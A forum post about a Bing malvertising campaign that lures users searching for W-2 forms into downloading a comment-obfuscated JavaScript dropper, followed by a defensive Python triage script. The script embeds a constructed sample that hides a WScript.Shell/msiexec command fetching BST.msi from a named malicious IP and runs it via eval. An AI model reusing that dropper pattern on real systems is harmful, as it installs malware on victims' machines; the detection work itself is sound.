08-21-2024, 05:35 PM
Multi-stage Malware attack exploiting the Bing search engine was found!
Recently, a new attack method exploiting Bing search results, which are typically easy to click on, has been identified.
A recent article reveals a new malware attack exploiting the Bing search engine. This multi-stage malware attack involves distributing malicious files, executing installers, connecting to C2 domains, and downloading and inserting backdoors to carry out attacks such as remote control, data theft, and the delivery of additional payloads.
When searching for "w2 form 2024", a commonly used keyword for U.S. federal tax forms, the first search result on Bing is a domain titled "Online Website 2024 | Home | W2-Form 2024" from appointopia[.]com. However, clicking on this site redirects users to a fake IRS website (hxxps://grupotefex[.]com/forms-pubs/about-form-w-2/). When users click on this site, they are prompted to solve a CAPTCHA, after which a malicious JavaScript file (Form_Ver-.js) hosted on Google Firebase storage is downloaded.
Upon analyzing the downloaded “Form_ver-14-00-21.js” file, it was found that the malicious code was concealed within seemingly harmless comments. This attack structure is advantageous for hiding malicious payloads, increasing file size to complicate analysis, and evading antivirus detection.
Analysis of “Form_ver-14-00-21.js” revealed that the script was designed to download and execute an MSI package from specific URLs. The script downloaded an MSI file named “BST.msi” from IP address 85[.]208[.]108[.]63. Another script downloaded a similar MSI file, “neuro.msi,” from a similar IP address, 85[.]208[.]108[.]30, suggesting that the same malicious code payload was used.
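A triage script for the kind of dropper the post describes, added here as an example; it is not part of the original post and not code from the analysed sample. It splits a JScript file into code and comments (tracking string literals so a URL inside a string is not mistaken for a comment), then looks in both halves for the indicators the post mentions: URLs on bare IP hosts, .msi references, msiexec / WScript.Shell / ActiveXObject / eval, and a script that re-reads its own source. It reports defanged IOCs and a simple score. The embedded JavaScript is a constructed stand-in that mimics the described structure (executable lines hidden inside a filler block comment, extracted and eval'd at runtime) and reuses the 85.208.108.63/BST.msi indicator the post names; it is not the real Form_ver-14-00-21.js. The indicator list, score weights and threshold are my own assumptions.

```python
import json
import re

# Constructed stand-in for the dropper described in the post (NOT the real
# Form_ver-14-00-21.js). The executable lines hide behind "@@ " markers inside a
# filler block comment; the short visible code re-reads the script's own file,
# pulls those lines out and eval()s them. Host and filename are the post's IOCs.
SAMPLE_JS = r'''// Form_Ver helper: validates W-2 form fields before submission
function checkForm(f) { return f && f.elements.length > 0; }
/* ------------------------------------------------------------------
   Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do
   eiusmod tempor incididunt ut labore et dolore magna aliqua.
   @@ var sh = new ActiveXObject("WScript.Shell");
   @@ sh.Run("msiexec /i http://85.208.108.63/BST.msi /qn", 0, false);
   Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris.
   ------------------------------------------------------------------ */
var fso = new ActiveXObject("Scripting.FileSystemObject");
var src = fso.OpenTextFile(WScript.ScriptFullName, 1).ReadAll();
var hidden = src.split("@" + "@ ").slice(1).map(function (s) { return s.split("\n")[0]; }).join("\n");
eval(hidden);
'''

# Constructed benign file: a URL inside a string literal must not be read as a
# comment, and an ordinary trailing comment must not raise the score.
BENIGN_JS = 'var s = "http://example.com/a.js"; // load helper\nfunction f(x) { return x + 1; }\n'


def split_comments(js: str):
    """Return (code, comments). String literals are copied whole so '//' or '/*'
    inside a string is not taken for a comment; regex literals are not handled
    (good enough for triage, not a real parser)."""
    code, comments, i, n = [], [], 0, len(js)
    while i < n:
        ch, two = js[i], js[i:i + 2]
        if ch in '"\'`':                              # string literal
            j = i + 1
            while j < n and js[j] != ch:
                j += 2 if js[j] == '\\' else 1        # skip escaped char
            code.append(js[i:j + 1]); i = j + 1
        elif two == '//':                             # line comment
            j = js.find('\n', i); j = n if j == -1 else j
            comments.append(js[i + 2:j]); i = j
        elif two == '/*':                             # block comment
            j = js.find('*/', i + 2); j = n if j == -1 else j
            comments.append(js[i + 2:j]); i = j + 2
        else:
            code.append(ch); i += 1
    return ''.join(code), comments


# Assumed indicator set for a JScript downloader; extend as needed.
IP_URL = re.compile(r"""https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?(?:/[^\s"'`]*)?""", re.I)
MSI_REF = re.compile(r'\b[\w.-]+\.msi\b', re.I)
B64_BLOB = re.compile(r'[A-Za-z0-9+/]{40,}={0,2}')   # long base64-looking runs
INDICATORS = {
    'msiexec': re.compile(r'\bmsiexec\b', re.I),
    'wscript_shell': re.compile(r'WScript\.Shell', re.I),
    'activex': re.compile(r'\bActiveXObject\b'),
    'eval': re.compile(r'\beval\s*\('),
    'reads_own_source': re.compile(r'WScript\.ScriptFullName', re.I),
    'adodb_stream': re.compile(r'ADODB\.Stream', re.I),
    'xmlhttp': re.compile(r'XMLHTTP', re.I),
}


def defang(url: str, host: str) -> str:
    """hxxp:// and bracketed dots in the host, so the report is safe to paste."""
    return url.replace('http', 'hxxp', 1).replace(host, host.replace('.', '[.]'))


def triage(js: str) -> dict:
    """Score a JS/JScript file and list IOCs, noting whether each sits in code or comments."""
    code, comments = split_comments(js)
    comment_text = '\n'.join(comments)
    report = {'comment_ratio': round(len(comment_text) / max(len(js), 1), 2),
              'ip_urls': [], 'msi_files': [], 'indicators': {},
              'b64_blobs_in_comments': len(B64_BLOB.findall(comment_text))}
    for where, text in (('code', code), ('comment', comment_text)):
        for m in IP_URL.finditer(text):
            report['ip_urls'].append({'url': defang(m.group(0), m.group(1)),
                                      'host': m.group(1).replace('.', '[.]'), 'in': where})
        for m in MSI_REF.finditer(text):
            if m.group(0) not in report['msi_files']:
                report['msi_files'].append(m.group(0))
        for name, rx in INDICATORS.items():
            if rx.search(text):
                report['indicators'].setdefault(name, []).append(where)
    # Payload "in comments": a download URL, an execution primitive or a base64 blob there.
    exec_in_comment = any('comment' in report['indicators'].get(k, ())
                          for k in ('msiexec', 'wscript_shell', 'eval'))
    report['payload_in_comments'] = (any(u['in'] == 'comment' for u in report['ip_urls'])
                                     or exec_in_comment or report['b64_blobs_in_comments'] > 0)
    # Assumed weights: IP-hosted URL 2, MSI reference 2, each indicator 1,
    # payload hidden in comments 2, comment-heavy file (>50%) 1; 4+ = suspicious.
    score = (2 * bool(report['ip_urls']) + 2 * bool(report['msi_files']) + len(report['indicators'])
             + 2 * report['payload_in_comments'] + (report['comment_ratio'] > 0.5))
    report['score'], report['verdict'] = score, ('suspicious' if score >= 4 else 'clean')
    return report


if __name__ == '__main__':
    for label, sample in (('constructed dropper', SAMPLE_JS), ('benign', BENIGN_JS)):
        print(label, json.dumps(triage(sample), indent=2))
```

Run it on a quarantined .js file by passing its contents to `triage()`; the `in` field on each URL and the `payload_in_comments` flag are what distinguish the comment-hiding trick from an ordinary script that merely uses ActiveX. A hit on `reads_own_source` together with a high `comment_ratio` is the tell that the visible code is only a loader for text parked in the comments.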